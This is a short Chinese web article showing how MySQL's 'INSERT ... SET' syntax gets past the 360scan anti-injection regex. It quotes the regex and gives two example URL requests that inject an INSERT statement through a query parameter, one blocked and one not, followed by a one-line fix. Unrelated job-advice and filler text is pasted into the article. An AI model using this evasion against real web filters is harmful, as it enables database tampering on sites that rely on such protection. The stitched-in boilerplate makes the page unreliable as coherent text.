Mysql语法绕过360scan insert防注入方法

求职必看有新招:工作简历莫要间隙,面试回答从容镇定,笔试应考仔细认真,言语交流坦诚求实,不卑不亢保持作风,心中有数定然成功!祝君顺利应聘,迈向辉煌!
360scan正则:INSERT\\s+INTO.+?VALUES

其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =

提交:

http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456')

2

提交set语法:

http://localhost/360.php?sql=insert into user set user='admin',pass='123456'

1

修复方法当然最好是加上set了。

本文Mysql语法绕过360scan insert防注入方法到此结束。漫无目的的生活就像出海航行而没有指南针。小编再次感谢大家对我们的支持!

您可能有感兴趣的文章
防止SQL注入攻击的一些方法小结

PoisonIvy Rat 远程溢出实战

PHP木马大全 一句话的PHP木马的防范

mssql2005 DB权限导出一句话

一次奇遇的渗透